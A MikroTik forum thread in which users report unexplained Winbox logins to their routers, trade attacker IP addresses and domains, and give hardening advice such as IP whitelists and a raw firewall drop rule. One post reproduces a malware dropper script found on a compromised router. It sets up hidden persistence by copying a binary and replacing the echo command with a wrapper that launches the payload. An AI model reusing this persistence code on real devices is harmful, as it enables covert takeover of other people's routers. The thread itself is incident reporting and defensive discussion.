winbox vulnerable! Unusual login to routers

thekrzos · April 20, 2018, 7:46pm

I noticed today an unusual login to my router exposed to external ip.
Router had only winbox 8129, ssh on the changed high port and pptp on the default port. Version 6.41.3
The password is random char + numbers + special chars and nowhere else used.

Login to my router:

I updated it to the latest version and downloaded it completely from the outside.

Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help in something:
save.sh
#!/bin/ash
case “$PATH” in
/usr/local/bin)

old versions

dest=“/usr/local/bin/”
;;
*)
dest=“/flash/bin/”
if [ ! -d “/flash/” ]; then
exit 1
fi
;;
esac

if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e “#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*” > $dest/.test
chmod +x $dest/.test

echo -e “#!/bin/ash\n/$dest.test&\n/bin/echo $*” > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.shdnstest is a binary file, I can send after contact on pw.

This is not the only case, this is log from my friend. He got only exposed winbox:

It looks like the first attempt to log in - here somewhere miraculously collects passwords from the router and later logging in with user perm = full.

IP:
103.1.221.39
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]

parham · April 20, 2018, 7:58pm

Hi, do you have any firewall setting in your Mikrotik?
You can have a white list ip address to access winbox, by just changing the port for winbox in the services doesn’t mean no one can try to connect to, as well as you can have a black list for the ip that login with login failure, if you don’t have a firewall filter rules, I can send you a default one, with a bit tweaked.

thekrzos · April 20, 2018, 8:22pm

Yes, i got firewall, but winbox port was exposed in the internet.
From it the attack came.

Sob · April 20, 2018, 9:42pm

This looks interesting … scary interesting.

Send everything to support@mikrotik.com. They will probably notice it here, and if it’s real, it will get to them from elsewhere too, but the sooner they get the info, the better.

squeeze · April 20, 2018, 9:45pm

If true, this is a very serious vulnerability and you should report it directly to Mikrotik support so they can fix it ASAP.

Btw, a basic security precaution is to remove or rename the “admin” user and use a different name entirely. There is nothing special about the “admin” name. In this case, it may not be relevant since they logged in with so few attempts.

Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.

wispmikrotik · April 20, 2018, 9:49pm

Hello everyone,

The same thing happened to me today.

What’s happening mikrotik team?
Any security problem not notified?
bug or backdoor?

AS131149 103.1.220.0/23 LJ Hosting Co., LTD

IP Address
103.1.221.29

Hostname
103-1-221-29.static.ip.net.tw

Name Servers
a.g-dns.com
b.g-dns.com
c.g-dns.com

Authority
a.g-dns.com
support@twnoc.net
221.1.103.in-addr.arpa

Network
103.1.221.0/24
AS131149
YUANJHEN-AS-TW Yuan-Jhen Info., Co., Ltd, TW

Designation
APNIC

Location
Banqiao, Taiwan
25.0143, 121.4672

parham · April 20, 2018, 9:52pm

Interesting, and by any chance did you used admin as a user or it was changed?

I think the best way is use whitelist and netinstall the Router.

But before doing that send a supout file to mikrotik.

And the last thing, use strong ssh key.

parham · April 20, 2018, 10:14pm

I just checked most of my Routers, all was ok (6.40.7), but one of them on 6.41.3 had too much attacked but I had rule to collect and block them, no login was established, I believed it a bug in 6.41.3 in firewall filter, I had a whitelist for inbox but looks like it wasn’t working, or somehow other rules below it was giving access to any ip to connect to which shouldn’t.

parham · April 20, 2018, 10:41pm

just to stop the attackers, create a whitelist IP address for example call Support and the the raw firewall

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support

wispmikrotik · April 20, 2018, 10:43pm

I have already notified the mikrotik support, I could not send the support file because the router is blocked.
@normis, mikrotik team can you check this immediately?
this is very serious.

wispmikrotik · April 20, 2018, 10:50pm

Hello,
I had configured that at 3 attempts d access blocked the ip, but have entered the first with a key of numbers, signs, uppercase and lowercase letters. It is clear that it is a very serious bug that does not require any effort to gain control of the router.

jspool · April 20, 2018, 11:01pm

Good catch. Will be interesting to get more details. Unfortunately vulnerabilities are a fact of life these days. For the last ten years I only allow trusted IPs access to Winbox & SSH. Its never a good idea to expose unnecessary things to the Internet in hopes that they will be resilient enough to ward off the ever so persistent probes and attacks. And changing port numbers helps to a point. I suppose if you use a good port scan blocker in your firewall you may be lucky and detect them before they find you. Its always better to restrict to specific networks or only allow access from VPN.

manuzoli · April 21, 2018, 10:48am

Looks like Mikrotik has sold good engough to become a very promising attack target for the bad guys.

I run an average network (Public C-Network) and I have an average of 215.000 tried attacks per day.
Thats about 2.5 attacks a second. I guess its a good thing to ramp up security and block SSH, HTTP, FTP and especially WINBOX so attackers have no hint that you are using Mikrotik devices.

anav · April 21, 2018, 3:45pm

Do we even know if mikrotik closed this door with 6.42???

sindy · April 21, 2018, 3:59pm

Likely not as it seems to be a new issue. So disable access to Winbox from the internet, and even better restrict it to just a few addresses from the LAN, until it becomes clear.

JohnTRIVOLTA · April 21, 2018, 4:38pm

1.Set user name and password with combination with cyrillic alphabet after that remoove or disable user - admin !
2.Change the port numbers for ssh , winbox etc.
3.Set strog crypto for ssh
4.Set ACL
5.Set 3 attempts login to black list and deny attempts with RAW
6,Disable all other non-useable services
Finaly connect the cable to wan ethernet port!

wispmikrotik · April 21, 2018, 5:32pm

In point 1 you’re wrong, just like the password type, I had a password of type “@ _23UbakJav!2947!#6hasd! - +)” and they have entered with a single attempt, it is something more serious that lets you see the key, only way to close all the ports to the computers on the LAN.

IS0FFD · April 21, 2018, 6:04pm

I had the same visit on three different days…

I noticed that it is from the day after the update 6.42 … randomness ???

I have set the due rules… I hope!!!

Quasar · April 21, 2018, 6:13pm

Can you please upload the ‘dnstest’ binary? Might provide some clues as to what’s going on..

thekrzos · April 21, 2018, 6:45pm

password: mikrotik
mikrotik.7z (34.9 KB)